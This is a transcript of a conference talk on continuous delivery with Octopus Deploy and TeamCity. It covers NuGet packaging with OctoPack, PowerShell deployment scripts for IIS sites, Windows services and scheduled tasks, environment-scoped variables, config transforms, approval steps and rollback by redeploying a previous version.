There's a lot of wrong ways to try to do continuous delivery. I didn't know that until I tried pretty much all of them. That brought a lot of pain. A lot of 4 AM, oh my gosh, rollbacks from production because something didn't go right. These are all lessons that were learned deep in the trenches of deployment in real world applications where you can't fail. You have to succeed or you have to successfully roll it back to something that your users can use because the next day business starts. So we've got some of the ways that I tried to build continuous delivery systems or practice continuous delivery without a system started out with a lot of batch files, a lot of manual deployments, a lot of really painful, not repeatable processes. It helped me develop a sense of what a good continuous delivery system should look like. It should have the following components. It should be, number one, highly automated. Automate everything you can. If you can automate your code deployments, your database deployments, if you can automate your infrastructure setup, there's going to be some good talks on that here today, that's going to make your life a whole lot easier because you're going to have a nice consistent environment and you're going to have a process that doesn't require somebody to remember all the steps or have it documented and follow it. It's completely automated so they can click a button and do it. The process should be very repeatable. I should be able to repeat a deployment into any one of my environments and know that I'm going to get the right results when I do it. Ideally it should be traceable. It should have some sort of visibility and transparency into what happened, what bits got deployed, who deployed them, when and where did they deploy them to so that if there is a problem, you know who you got to go talk to to get it fixed. Let's look at some examples of some of the wrong ways to do continuous delivery. Like I said before, the manual way. This involves maybe a developer fires up his Visual Studio and right clicks and says publish and selects the deployment target of the production servers and clicks go and hopefully I remembered to put it into release mode instead of debug mode so it will have the right config transforms. Maybe you have logged it in a spreadsheet somewhere so somebody else would know that you actually did a deployment rather than just say hey, the website suddenly broke in. What happened? Oh, I did a deployment. Did I not do it right? You know, this is obviously not going to be consistent, not going to be repeatable by any means and it's not traceable. So you take a step up and you go cool, let's write a batch file that does this. That's a step in the right direction. It's a little bit more repeatable. You might build some logging into it so it's kind of traceable and it's slightly more consistent although now you've got probably a bunch of stuff like hard coded network file share paths on production or hard coded IPs of database servers or there's a lot of stuff in there and you still haven't necessarily made a consistent build process so you don't know what you're going to be deploying. You don't know that it's built correctly and that all the tests have been run and passed. So you don't really have the kind of traceability you're looking for there. So what that has led me to do is find, I found a tool called Octopus deploy that helps manage your automation of your deployment environment. And this is the Octopus way of deploying things. 
They support the concept of build once and deploy everywhere. So that means that the exact same binaries that got built and deployed to the dev environment and that got built and deployed to the staging environment and the production environment and that way whenever you have testing around this and your QA department signs off a particular version you know those exact same binaries went to each version. Not that some developer accidentally built the wrong commit or built off the wrong branch and oh whoops even though it got signed off in QA I built the production release from my local feature branch so it's all broken. It incurs, it creates this process that is repeatable. It's extremely automated because all you have to do is click a button and everything happens and it's got a lot of traceability and logging built right in. So let's stop and take a quick look at what Octopus deploy looks like and how powerful it can be. Just bear with me a second here. Okay. All right. So this is our Octopus deploy dashboard. All right, all of a sudden right now I have a very nice glimpse into all my applications of which I only have one. I could have a lot up there. I could have multiple projects in groups. This shows me I know exactly which version has been deployed to development, which version is in test and which version is out in production currently. Obviously you can see here we've done some work, we've deployed some new stuff to the development environment and have kind of you know the developers have hacked away on it a little bit and they feel good about it. But now it's ready to go to QA and user acceptance testing. Well, this is how we do this with Octopus. I can just click on that release that I did there. Sorry, these virtual machines are a little bit slow. There we go. And I can say okay cool. Here's the steps that were followed. Here's exactly what this tool performed on my behalf that I configured to deploy to development. Let's just promote that. Okay. So we'll promote it to UAT and we'll force the packages to be reinstalled for fun and click deploy and it's going to go off and do it. The exact same binaries that I already built and tested in dev is what's going to get pushed out to my UAT environment and the only things that are going to change is a little bit of configuration. We'll get into that in a little bit. And as you can see, here we go, we just checked off complete. I just did a staging deployment right there. That's simple. And now if I go back to my dashboard, I can see great. Version 1.0.34 is now in UAT. Our QA team is going to work on it. We're showing it to users. We're getting user feedback for our next sprint. And if they sign it all off, we're going to push it right out to production. So this dashboard becomes a nice information radiator to your whole team, your dev team, your ops team, your QA team. You can put this up on a, you know, a shared screen somewhere on a wall so anybody always knows, hey, I can see exactly what version is there and what version I can expect to find in each environment. And if we've done, hey, did you guys do that production deployment yet? Well, go look at the board. Nope, we sure didn't. Now all that information is here and accessible. So let's, sorry, it's bouncing. It's going to be a little bit painful. Okay. So we did our demo. So what kind of things can you deploy with Octopus? I mean, if it's, you know, a somewhat opinionated deployment system, what kind of things have they built in support for? Well, pretty much everything. 
You can deploy a website to IIS. You can deploy your Windows services, your scheduled tasks. You can do all kinds of deployments to Windows Azure with websites via a Git deployment or an FTP deployment. You can push out packages to an FTP or an FTPS server. You can push out cloud deployment packages to Windows Azure and have some nice options there to say, hey, keep my scaling that I set in the cloud or reset my scaling to what's in the package. And you know, with the new MSDN, Windows Azure usage rules, you can make a lot of nice use out of that. But basically it can really deploy just about anything. The way Octopus works is it uses NuGet packages for deployment. So you simply take each component of your application, you package it up as a NuGet package, put a little deployment script in there, tell Octopus where to find it, and it says, okay, great. I'll start reading it and looking for my versions from that server and deploying those packages based on a set of conventions and rules. But the NuGet packaging format, it doesn't really look like a regular NuGet package like you might be used to in Visual Studio. All it's really used it as is a nice zip container with some metadata that describes the versioning and content of the package. Other than that, it's basically just your application sitting in a NuGet package. So the deployment scripts I mentioned are all written in PowerShell. So you've got the full.NET runtime at your disposal pretty much with PowerShell. Anything you can do in PowerShell, you can do in your deployment script in Octopus. It looks for a set of predefined package or deployment scripts that you see here and it actually looks for them in this order. So it'll run, you know, once it takes and unzips your package, it will say, okay, great. Now if I unzip this NuGet package that you told me about, I'm going to look and see if there's a pre-deploy.ps1 file and if so, I'm going to execute it. So if you need to do something like, I don't know, shut down a worker process on a website or, you know, have a particular package shut down a load balancer, you know, and say, hey, take me out of load balancing before you actually run the deployment, you can do that in a pre-deploy. A deploy.ps1 is what's going to execute to actually perform your deployment. Now some of the stuff is kind of auto-magical with Octopus. You get website deployment for free. If it is a, if Octopus finds a web.config in your package, it says, hey, I assume you're talking about a website here. I'm going to go to IIS, look for a website with the same name as the package or one that you configure and go ahead and update it. It actually does a pretty nice version of that that supports, that helps support a rollback concept whereby all it does is it deploys each version of your application into a new folder with that versioning number. And then it just repoints your IIS website at that folder. And that way if something is wrong and you absolutely have to roll back, you can just go point IIS back at the old version and everything's back to how it was. So, and in that case, you don't even need any deployment scripts at all. If it's a website, it'll just deploy it. And if you're deploying something a little more difficult to deploy like a Windows service or say something that needs to run as a scheduled task, you're going to need to write some deployment scripts for that. And there's some examples on the Octopus deploy website that kind of show you some things. 
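As a concrete, entirely hypothetical illustration of that pre-deploy hook, a PreDeploy.ps1 for a web package might do nothing more than drain the node and stop the app pool before the new files are copied in. The app pool name and the health-check file below are invented, and a matching PostDeploy.ps1 would start the pool and put the health-check file back afterwards.

# PreDeploy.ps1 -- illustrative only; pool name and health-check path are made up.
Import-Module WebAdministration

$appPool     = "Catalog"
$healthCheck = "C:\inetpub\wwwroot\Catalog\healthcheck.txt"

# Remove the file the load balancer probes so this node drains out of rotation.
if (Test-Path $healthCheck) { Remove-Item $healthCheck }

# Stop the worker process so nothing is locking files while the new version is copied in.
if ((Get-WebAppPoolState -Name $appPool).Value -eq "Started") {
    Stop-WebAppPool -Name $appPool
    Write-Host "Stopped app pool $appPool ahead of the deployment"
}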
And I'll show you one today that can deploy a Windows service. So let's look at it. All right. So we're back in our friendly demo machine over here. And we're going to jump right over here to Visual Studio and look at a deployment script. So we'll look at our, let's see, about our mailer. No, not the mailer. The service bus. The service bus runs as a Windows service. Maybe it's a WCF server hosting in service bus or something. Whatever it happens to be, you need to deploy a Windows service. So here I've got a deploy.ps1 script that, oops, there we go. Come on. All right. Sorry, that zoom did not work very well. So we'll just walk you through it. The deploy.ps1 script here, that's going to be hard to see because it won't let me scroll on this Mac in a Windows virtual machine. Yay. Is, let me try this one more time. There we go. Okay. So here, this is a script that I took right off the Octopus Deploy website and just kind of customized a little bit to fit my needs. And it's going through here, as you can see, and it's using sc.exe in order to actually deploy the service. So we're using standard PowerShell features like Get-Service, define the service name. This is all basically, none of this stuff is really that specific to Octopus. This is just how you would write a PowerShell script to deploy a Windows service. And if you've already written some PowerShell scripts to handle some of your deployment, Octopus is going to be a great fit for you because you can convert it right into an Octopus deployment script. As you can see here, it just goes through and says, great, here's the service, here's the path, and let's execute it. And we'll get into some of these variables a little bit later on because they get pretty powerful with Octopus and really help you modularize the way your scripts are written in order to handle a deployment. Actually, since we have to keep bouncing back and forth, let's just get into variables right now so we don't have to switch back to the slide deck. So the variables in Octopus are defined in the Octopus portal right over here. In your actual project, at your project level, you can come in here and click variables and define a set of variables that will be available in your project. The variables can be scoped to a particular environment, which is great for something like connection strings. So I can define a connection string variable and then say, okay, well, for development, it's this connection string, but for UAT, it's here and production, it's here. Another nice thing about this is that now you don't have to have this in a config file transform that developers have access to with your production connection string checked into source control. And you also don't have to remember to manually replace them. This can be defined in here, and you can set permissions around who can view these variables and keep it so that only the people who have the, who have the, who need access to particular variable values like a production connection string can see them or edit them. As you can see, I can also develop, Octopus has what they call a set of roles for each machine. And so I can say, okay, this machine is a front end web server. This machine is a database server. And whenever I tell it to deploy a package, I'm going to tell it, all right, great. Go ahead and deploy this to all my front end web servers or deploy this to all my API servers. And you can scope your variables according to those same roles. 
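Since the script on screen is hard to make out, here is a rough reconstruction of what a deploy.ps1 along those lines can look like. The service name and the variable names are invented; the only Octopus-specific assumption is that the project variables just described (scoped per environment in the portal) are handed to the script through the $OctopusParameters collection.

# Deploy.ps1 -- a sketch, not the speaker's actual script.
$serviceName   = "NDC.ServiceBus"
$exePath       = Join-Path (Get-Location) "NDC.ServiceBus.Host.exe"
$runAsUser     = $OctopusParameters["ServiceBus.RunAsUser"]      # scoped per environment in the portal
$runAsPassword = $OctopusParameters["ServiceBus.RunAsPassword"]  # kept out of source control

$existing = Get-Service -Name $serviceName -ErrorAction SilentlyContinue
if ($existing) {
    Write-Host "Stopping and removing existing service $serviceName"
    Stop-Service -Name $serviceName -Force
    & sc.exe delete $serviceName | Write-Host
}

Write-Host "Installing $serviceName from $exePath"
& sc.exe create $serviceName binPath= "$exePath" start= auto obj= "$runAsUser" password= "$runAsPassword" | Write-Host

Start-Service -Name $serviceName
Write-Host "$serviceName installed and started"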
You can also scope a variable down to just a very specific step as I've done here with the service bus. So with, so you might be asking, all right, so what is a step? That seems to be the real, you know, nuts and bolts of this deployment stuff. And the steps, as you'll see here, are the NuGet packages that you have created for your apps. Whenever you define a step, you can then add it to a project as, hey, go deploy the catalog app, go deploy the API. And there are other types of steps that are not necessarily package steps, but also you can have it send an email, you have approval steps, which is great for authorization workflows. I can define, as I have in this project, a approval required step that says, all right, this is a manual step. And only people from the specified group that I've defined an octopus have permission to let this step proceed. And I can even scope that to environments. So in this project, I've put this manual approval step that is required for production only. So anyone can deploy to development and user acceptance, but only a certain group of people can deploy to production. And whenever it hits that step, it's going to stop, it's going to pause the deployment and say, hey, one of these people has to come here and click this button. So that way you get some, not only your traceability, but you have a nice authorization workflow into who can actually promote releases into specific environments. And as a developer, you should love that because it's kind of a safety net. If you're not authorized to deploy into production and they set your process up correctly, you can't shoot yourself in the foot by accidentally deploying to production. It'll stop before it happens. Now in addition to the variables and config transforms, I'll show you something else when I edit this catalog app that you can define, which is your config transforms. So right now, you may have, especially if you're developing ASP.net websites, you may have a lot of web.config and web.debug and web.release and web.production.config files that hold all of your transforms. Octopus has full support for all those. And it will automatically deploy and run your star.release.config. It doesn't work just for web.config. It also supports basically anything that ends in a.config file name. It will look at it and say, hey, do I need to apply these XML transforms to one of your, you know, correspondingly named configs? That will always run star.release.config for every deployment. So if there's something that needs to happen on every single deployment you do, like, you know, remove the compilation debug attribute, then you can put that in your web.release.config and it'll get run for every deployment in every environment. And then after it runs that, it will come through and look for a file called something like web.production.config or web.uat. It's going to substitute in the environment name in order to actually figure out which files need to be run. Once it gets done doing your XML config transforms, it will then take anything you've defined in the variables and try to substitute in for connection strings and app settings. So if you've defined an octopus variable with the same name as your main connection string, then after all your other config transforms have run, it's going to go ahead and try to substitute that out with the value you've specified in the portal. The, and it's also going to do that not just with connection strings but also with the app settings element. 
So if you've defined a bunch of app settings in there, you really don't have to keep those in config transforms anymore. You can keep them all in the octopus portal. The things that I tend to keep in the web.config or whatever transforms are, say, if you're using the Windows Identity Foundation and you've got to have one of those Microsoft dot identity big XML things transformed for each one of your environments, that octopus can't do for you. So you're going to keep that in your web.production.config and store that with your source control and it will go ahead and apply that for you whenever you deploy to production. And you can also, as you see down here with the additional transforms, I can also define any comma, you know, comma separated list of any files I want it to apply transforms from. So if for some reason you don't call yours web.production.config, you call it, you know, mysuperawesome.xml config. Great, you can define that here and it will still try to treat it like a config file. Now, the, oh, sorry. So that's how we can define XML transformations and then on the variables, you know, I mentioned before that it would try to substitute those in for your app settings or your config values. Well, the other thing it will do, as you saw kind of a preview in the deploy.ps1 file we looked at, is it makes those variables available to your PowerShell scripts. It makes them available as environment variables, I believe, and also in your MS build files. So if you have a, if you've already got a nice big MS build file that you wrote for TeamCity that does stuff, you can still, you can start accessing TeamCity, I'm sorry, Octopus deploy variables that you define in that MS build script to help substitute in things like the path to which it is currently deploying your code, the environment to where it's being deployed, the, basically any other thing, it has a whole, there's a whole set of standard Octopus variables that get made available such as the current version you're deploying, the name of the package, what environment you're deploying to, what machine you're deploying to, the path on that machine. So you can take that and do a lot of really powerful stuff with it in your PowerShell scripts or MS build files. And we've already kind of taken a look at that, but I'll show you one more, a little more interesting one. Oops. Come on. All right. If we look at our, no, not our mailer. Oh, all right, I guess this version of the project does not have one. Well, anyway, one of the interesting things I had, one of the interesting tasks I had to take on in deploying my own code was to set up scheduled tasks, which can be done with PowerShell, you know, so I wrote a nice big complicated PowerShell file to do that and just substituted in my Octopus deploy variables in order to know which environment it was and to name my, you know, since I had some environments that existed on the same machine, I would make sure that, you know, it used the environment name, prepended on to the app name in order to actually differentiate which version of the code was running. So now, let's actually take a look at the environments. You're going to see we have a pretty boring and bland environments page here because I've only got so many virtual machines that can run on a laptop. But this kind of demonstrates how you would actually define what your physical environment looks like to Octopus. 
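Going back to the scheduled-task idea mentioned a moment ago, a sketch of that kind of script is below. The task name, schedule, and the DeploymentEnvironment variable are all hypothetical; the point is only that the environment name gets prefixed onto the task name so several environments can share one machine.

# Illustrative scheduled-task setup; names and times are made up.
$environment = $OctopusParameters["DeploymentEnvironment"]   # a variable you would scope per environment in the portal
$taskName    = "$environment-CatalogNightlyImport"
$exePath     = Join-Path (Get-Location) "NDC.Import.exe"

# Drop any previous definition, then recreate the task pointing at the freshly deployed exe.
& schtasks.exe /Delete /TN $taskName /F 2>$null
& schtasks.exe /Create /TN $taskName /TR "`"$exePath`"" /SC DAILY /ST 02:00 /RU SYSTEM | Write-Host

Write-Host "Scheduled task $taskName now points at $exePath"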
So you can say, great, I've got, you know, these 20 machines that are part of my production environment and you can assign your specific roles to them so that you know exactly which versions, you know, which machines are going to actually, are going to get deployed to whenever you kick off a deployment to a particular environment. So currently, the Octopus uses a nice secure communication stack that uses client certificates on both the server and on the what they call tentacle machines in each environment that encrypts all communications between it. So you can, so you don't have to worry if some of your machines are sitting out in the cloud and you've got to reach out to them from behind the firewall, that's going to be done securely. None of your, you know, production connection strings or anything like that are going to get transmitted out across the wire insecurely. Currently Octopus deploy uses a push-based deployment model. So you install a Windows service on the tentacle machines that, and open up a port, by default it's like 10933 or something, but that's configurable. And the Octopus server actually reaches out to each tentacle and says, hey, it's time for you to deploy this code and it sends the NuGet packages and all the variable data down to the tentacle across that secure communication channel and kicks it off into work. There have been some people who say, hey, my Octopus server is here, my other servers are over here behind a firewall and the network admins are not letting me poke a hole in that firewall. With 2.0, that's going to be coming out later this summer, Octopus deploy is going to enable actually, I'm sorry, actually I believe with 1.6, maybe in this version, yes. In 1.6, they've actually enabled a pull-based deployment where the tentacles can reach out and request and download the packages directly. So that helped, but the Octopus server still has to send messages. With 2.0, that will become a truly pull-based deployment whereby the tentacles can just check in and find out if they need to actually execute a deployment. Now I'll jump back over here for just a second. So you're probably sitting there thinking, all right, that sounds great, but you just told me that I now have to go build NuGet packages for all of my deployable pieces of my application. That just sounds like that much more work, right? Well luckily, they've thought of that for you, and there's an open source project that the Octopus deploy guys have created called OctoPack that is a NuGet package that will create your NuGet packages for you. So you can simply open up Visual Studio with your solution open and say, all right, Install-Package OctoPack, and it's going to install some files up at the top of your solution, similar to how NuGet's package restore works, that will automatically, and then it's going to go through, and for each project that you inject it into, it's going to import an MSBuild target. This is great. Whenever you build in release mode, go ahead and create a new, you know, an Octopus deploy compatible NuGet package based on conventions. So it goes through and looks at the files in your project and says, cool, I'll grab all these, I'll package them up, create a NuGet-compatible, or an Octopus-compatible, NuGet package for you that's ready to be deployed with your Octopus server. So that can happen just automatically as part of your build process. 
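For reference, wiring OctoPack in amounts to roughly the following. The project and solution names are placeholders, and RunOctoPack / OctoPackPackageVersion are the MSBuild properties OctoPack is generally driven with on a build server; it is worth checking them against the version you actually install.

# In the Visual Studio Package Manager Console, once per deployable project:
Install-Package OctoPack -ProjectName NDC.Catalog.Web

# On the build server, the same convention-based packaging can be triggered from MSBuild:
msbuild .\NDC.sln /p:Configuration=Release /p:RunOctoPack=true /p:OctoPackPackageVersion=1.0.36.0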
Now with the, so with your build process, if you're using something like TeamCity, you can automate your build to create and produce these NuGet packages for you so that Octopus can consume them. So let's take a look at that. Real quick, how many people here are using a Continuous Integration server of some kind? Most of you, good. How many are using TeamCity? Most of you, good. TFS, anybody? Okay, that's same. Anybody? The nice thing about this build automation piece is that it can be done with any Continuous Integration server. It's not specific to TeamCity, although Octopus does supply a TeamCity plugin to help make some of the interactions easier. All you need to do is build your code continuously, run your tests, and ultimately publish those NuGet packages that get created by Octopack out to some NuGet feed somewhere. It could be a MyGet feed that you have out on myget.org. It can be TeamCity's internal NuGet feed. It can be a file share inside your firewall that can act as a NuGet feed. But you can do it with Jenkins or Hudson or, I mean, cruisecontrol.net if you're glutton for punishment. But we're going to use TeamCity because I find it pretty easy to configure. As you'll see here, I've got a Continuous Integration build. This is configured to build every single time I check in code and run all my tests, of which I don't think I have hardly any, and I'm a bad developer. And then ultimately produce a NuGet package as its build artifact. And since TeamCity has the capability to publish any build artifacts to an internal NuGet feed right off the server, if you're running TeamCity, you've already got it. You just say, okay, cool. You can build NuGet, and whenever you produce build artifacts that are NuGet packages, as I've done here, it will go ahead and add those to the NuGet feed coming off of here so that they're exposed to Octopus deploy. Once those packages have been built, you can come over here to Octopus deploy. And say, great, I want to create a release. And it tells me, hey, my last release was this. So I know what I'm doing version-wise. It goes ahead and looks, as you can see here, at my TeamCity feed that I have it configured to pull packages from and finds the latest version. Or I can come over here and say, well, no, I want to do a specific version of this package because we found a bug in 1.34. So let's release 1.33 for this. I'm just going to do the latest version. I'm going to call this 1.0.34.1 because I can't use the same version number again. And I can add some release notes. Do you see? That will show up to anybody who looks at this release. Markdown is supported in here. So you can put some pretty nice release notes in there for people to go view them on your Octopus portal. And I've created the release. Awesome. Where did it go? It didn't go anywhere. It has the idea of creating releases as a declared, hey, this is a release I want to create. Here's the versions I want you to use. Here's the release notes. That's everything before you ever actually deploy it. So you could create the release and you could come back and edit the release notes and stuff before you ever deploy it. And then to go deploy this release, I'll say great, I want to deploy this to development, go. And it's going to go run my deployment again. Well, that's great. But remember when I said that a really good continuous delivery system is highly automated? That didn't feel very automated. Somebody still has to go and create these releases and all this stuff. 
And it's prone to them picking the wrong package version and all that stuff. So what we really want to do is utilize OctopusDeploy's REST-based API in order to automatically create and deploy our releases. I'm going to do that using the TeamCity plugin that OctopusDeploy provides. They also provide a simple command line tool called octo.exe, which is what the plugin uses in the background, that you can automate yourself in any other continuous integration system. And if I look at the configuration settings of my build here and go look at my build steps, I've already, you know, I've cheated and I've already configured this ship it step. So I'm going to enable that build step and I'm going to run my build. And what this will do is run a build with TeamCity. As you can see, it's already starting to run. And go ahead and use the OctopusDeploy API, or the built-in Octopus plugin for TeamCity to talk to Octopus's API and create a release with my build number and the version of the packages that I just created and start deploying it. So let's see here. We are building. We are on conference Wi-Fi getting code from GitHub that hasn't actually changed. And it's going to run my build, go out and do all this. Great, here we go. And now it's running OctoPack. We'll go in here so we can drill into the details and see what all it's actually doing. So here you can see the OctoPack step. You can see the MS build message is coming up there from where OctoPack is automatically creating my NuGet packages without me really having to configure anything. And once it gets done running this build, it's going to move on to step two, which is going to be talking to the Octopus server. And what we're going to find is that this right here, I predict failure. This is a, I show this for a reason. This step is eventually going to fail. And I'll tell you why. In case you guys go back and start using your TeamCity and your Octopus deploy to try to set this up and say, great, we've got this automated build. It's just add a build step for Octopus deploy. That looked nice and simple. Well, the problem is that this is dependent on the artifacts of the build. And sorry, this is taking too long to fail. You can see on my dashboard we can see a deployment is running. Eventually it's going to fail. The problem that we're running into by just creating this build step right here, you know, well, great. And a URL, a key, a couple of settings, is that this is now dependent on the artifacts produced by this build step right here. But they're all part of the same build configuration. And in TeamCity, the build agent doesn't publish its artifacts back to the server until it's finished all the steps of the build configuration. So when I first tried to enable this whole scenario, I did this right here and I kept getting that Octopus deploy had failed because it couldn't find the packages. See, there we go. And I'd come here and I'd say, great. It's trying to download the packages. And it says, hey, I couldn't find the package version you specified in that NuGet feed. And I was like, yeah, it's built. It's right there. And the fun part is that now that this has finished, it will have published artifacts at this point. So now if I come back here and say, try again, it'll work, which will lead you to bang your head against your desk repeatedly because it'll keep happening in that same cycle. Every time you push to the continuous integration server, it runs a build and it fails to deploy. 
And then you click try again and it deploys like a champ. And you go, what's going on? That's because there's a dependency chain here that I didn't think through well enough at first. And once I finally figured it out, I realized you've got to have your Octopus deployment step happen in a separate build configuration. Now, remember I told you before that you can create a release and then deploy it. So if all you want to do is have your continuous integration server create the release but not deploy it, you can put it all in one step like we did already. And that'll be fine. It'll create the release because you're not actually trying to download the packages yet. And that's fine. So let's go, nope, that's not what I want. Let's go in here and disable that build step that did not work and take a look at our deploy to development step. So this, I've taken a snapshot dependency on my continuous integration build here that is going to say, hey, great, this build is basically linked to the point in time snapshot from source control that the other one was. That way I know that it's running against the same version. And really, that's mostly just a trick in order to try to get this deployment build number. It's the exact same build number from my previous build for this build. The real fun part here is the build step for Octopus deploy. So I've created, I've selected the Octopus deploy release. There's also a promote one that will take a release you've already created and push it to another environment. I don't know if that needs to be automated. It's only one click in Octopus. And it's going to, I just give it my URL, my API key that I got out of the Octopus server, which project I'm working with for the release number since I have TeamCity creating semantic versioning style release numbers. I'm just going to use my build number for that. That's an important note. Octopus deploy depends on you using semantic versioning for your packages and for your releases. And here's a fun tip for your package versions. Make sure that you are using all four semantic versioning sections. If you use less, it will fail to find your packages when it downloads them, which is a fun bug to trace. And I tell it, all right, don't just create the release. I want you to deploy it to my development environment. And I want you to wait for the deployment to complete. And then pro tip, package version equals. This is telling it, hey, I want you to use the same build number from my build for all of my packages. Otherwise it defaults to using the latest. And there can sometimes be a slight delay in how quickly TeamCity publishes the packages out to the NuGet feed. And I've had to, on some larger projects, build in a little manual sleep step to tell the build server to sleep for 30 seconds to ensure that TeamCity has had time to get those out on the NuGet feed. Otherwise, if you don't have this, it will deploy an old version of your code and you'll go, how did that happen? If you have this, your build will fail if it can't find the step, which is exactly what you want it to do. You don't want it to tell you, hey, I successfully deployed build version 1.0.35 only to find out later that it had 1.0.34 of the API in it. It's no good. So with this configuration set up, I can now run this build and it will trigger a build chain that will run a continuous integration build and then run the deployment step to actually deploy the results of that continuous integration build out to my development environment. 
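Under the covers that build step is doing roughly what you could do yourself with octo.exe, something like the call below. The server URL, API key, and project name are placeholders, and the exact switch names may differ between octo.exe versions, so treat this as a sketch rather than the definitive syntax.

# Create a release and deploy it to Development, waiting for the deployment to finish.
.\octo.exe create-release `
    --server=http://octopus.example.com `
    --apiKey=API-XXXXXXXXXXXXXXXX `
    --project="NDC Demo App" `
    --version=1.0.36.0 `
    --packageversion=1.0.36.0 `
    --deployto=Development `
    --waitfordeployment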
What I typically do is configure a build trigger for this that says, hey, on every check-in, go ahead and deploy to development. And that way, the developers can get out there on the dog food server and check it out and make sure it works against a large data set, you know, whatever. If you have a large team that's committing really frequently, that might be too much. So maybe you want to do it hourly or maybe you want to do it nightly. But this starts to really get the nice automation piece of your continuous delivery cycle. What you get here is that on some regular interval, either every time I push code or every hour, every day, that code from all my developers is getting scooped up, built, tested, and deployed to the development environment so they can go run tests against it. And maybe even after it's deployed to your development environment, you might have another build step that kicks off that goes and runs some, you know, PhantomJS or Casper testing to do some automated UI testing against that and further validate it. And the point being that once you've done that, all right, great. See, this all ran automated and I've got this nice deploy and now look, 1.0.36 went to development. Great. So we're constantly pushing out to that development environment, which means that whenever QA comes and says, hey, we're ready to start testing for the next release, all right, cool. One click. I come in here. All right, well, to be fair, maybe it's like two clicks because I'll click on that and then click promote and then click go. But still. Now I can go ahead and promote that. I think I selected development though, so that's no good. Anyway, I'm redeploying it to development, but had I done it correctly, I would have selected UAT and said, great, there you go, QA. Now you've got the exact binaries that we just told you were ready to test out there in your UAT environment, ready for you to start hacking away on. And as you can see, oh, I guess I haven't showed you that this is actually deploying our app. Here we've got our development environment. And as you can see, I've added the versioning here. So it's pulling the version off the DLLs. 36 is here on our UAT environment. You see I've got 1.0.28. So let's go ahead and make sure we promote this out to UAT. Deploy that release. And once that finishes, we'll be able to verify that we've got the right version out in our UAT environment. Now you might start asking yourself right now looking at, hey, hey, can I make sure that it follows a particular workflow? Can I enforce that a release has to go from dev to UAT, it can't go from dev straight to production? Unfortunately, no, not right now. That is a 2.0 feature that's currently being built. So that part is going to come where you can say, oh, great. You can't release something to production unless it's been through UAT or unless it's been through maybe you have three different UAT environments that represent different platforms you operate on or something. You can force it to go through test cycles on all of that before it gets out to production. So now that we've completed a deployment to UAT, we'll look and say, great. Here we go. Now we've got 1.36 in UAT. So we've still got 1.28 out in production. Let's go over here and just to show the approval process, we will promote this to production and say, OK, deploy this release. So what will happen here is it's going to start and it's going to go and download the packages and get all ready to deploy. It's going to make sure everything's ready to go. 
I'm ready to execute this deployment and then boom, it stops. It says, hey, approval required. Now I happen to be a member of the group that can do the approval, so I get the proceed or cancel buttons and I can put approval notes in here. If I were just Joe developer without access to that, then it would just say, hey, approval is required from a member of this group, whatever group you've defined in Octopus. And that's production deployers or release managers, whoever. So I'm going to say here, go. Awesome. I have just authorized that and it shows in here, hey, it was approved by Jeff French with these notes. So maybe your organization has a really sophisticated change management system that you have to put in a ticket in order to do a production deployment and get that approved. You could put your ticket number in here so that they can refer back to that and have some traceability into it. So now I can see, all right, great. This was approved by Jeff French. That's awesome. And then I can go and see what it actually did to do the deployment. It went and found the package and it outputs all the stuff. Here's all the variables that it's going to use in order to actually execute this deployment. Here's the XML transforms that I've performed. Here's the IIS website that I updated. It gives you all this information. And then your deploy.ps1 scripts or all your ps1 scripts, you can just pipe any output of any commands to the Write-Host command and that will show up right here in the same log. So you can see all your info there. As a matter of fact, a good example of that is on the service bus. You can see here that it went through and here's the messages from my deployment service saying, all right, great. This is what happened. So you can output anything you want to show up in these logs and they're in one nice central place. So, yes? Can you also do a test deployment to check everything before you actually deploy the code? Well, no, there's not a feature. I'd never even thought of that before, actually. There's not a feature for that currently. I'm trying to think how that would actually operate because it would actually have to perform a lot of those steps in order to get any of the logs, you know. But some of it you could probably do and not actually alter IIS or whatever. But if it's executing your deployment script, that's going to go ahead and get up there. So, all right, that's what I've got for today. You guys have any questions? Any more questions? Yeah? Yes? It can. The way I show it being automated, it always uses the same version for every package. But if we look back at the, well, I'm going to have to change around too much. But when you saw that when I manually created that release and I got to select which version of the packages I want, that's a scenario where you would want to use that. You would want to say, okay, great. We're only pushing out the website. So let's go ahead and select that version. And then you can also, on each one of those deployment screens, you saw every time I selected to promote it to a new environment, there was a list of check boxes there. That was all of the steps. And if you check one of those boxes, that step will be skipped. So I can say, okay, great. Skip the database because we don't have any database changes. Skip this, skip that. And let's just deploy the website. And that way, and like I do that quite frequently so I can deploy changes to just one section of the app without affecting any of the rest of them. I think that's only manually. 
You can't have it sort of check the version? Oh, no. There's no automated way for it to say, hey, there's no new version of this. Now that's something you could build in the way that you create the releases. The Octopus default thing won't do that. But you can use the API, you know, in building your automation piece that says, hey, if the version is the same as what's already out there, because you can use the API to interrogate which versions have been deployed, then don't do it, you know, so. Yes? What's the rollback strategy? There's not one. Essentially, there's not an automated rollback strategy. Now you saw when we looked at the deployment scripts, there was a DeployFailed.ps1. That will only be called if one of the steps previous, all the way up to the PostDeploy.ps1 step, fails in some way, you know, if you have a PowerShell exit code that's non-zero or anything else fails, then it will execute that DeployFailed.ps1. Now in there, you could try to do some fancy stuff. I know there was a request at one point to the Octopus guys to say, hey, can you make the previous deployment version number available to my DeployFailed.ps1 so I can automate the rollback? And that's really a tricky, tricky piece to do. So they haven't got it worked out just yet. So right now, the rollback strategy is the fact that it deploys each version into a separate application, into a separate folder, so you would go repoint your application. But more than that, because this deployment process is repeatable, you would just go run it, go redeploy your previous version. And it will go back and run your deployment again and have everything back the way it was. Yes? If you don't have a fully automated pipeline, say there's a manual QA step in the middle, and you want the deployment to pause partway down the pipeline so QA can check things before it continues, is there any way to build that in? Yeah. So what you could do, if I'm understanding what you're looking for correctly, is that you're saying that in your deployment, you would execute a certain part of the steps, and then QA would step in, smoke test your stuff before you turn the load balancer back on, that type of thing. Yeah. What you can do is you can use the manual steps for that. So like you saw, I had a manual step at the beginning. I could put that anywhere I want. So one thing I've done in the past is say, okay, great. Right before my PowerShell step that's going to bring this node back into load balancing, I'm going to have a manual step there that says, hey, someone from the QA group has to sign off that this is good. And maybe right before that manual step, I'll have an email step. I didn't get a chance to show that part. But the other step types you can use in Octopus are an email step where it will send an email to a certain set of addresses to notify, hey, this deployment's happening, or hey, this deployment's been done, but you need to smoke test it before we go live, you know, or something. So that's how you would kind of implement that currently. Yes? So we've got all these developers that have access to the source tree, and we deploy the components from that source tree. How do we keep things like production passwords away from them? Couple things. Number one, we've got the variables with permissions around them. So you could specify, you know, your scripts could rely on pulling that variable out of the Octopus portal and make it so developers don't have access to that password. Okay.
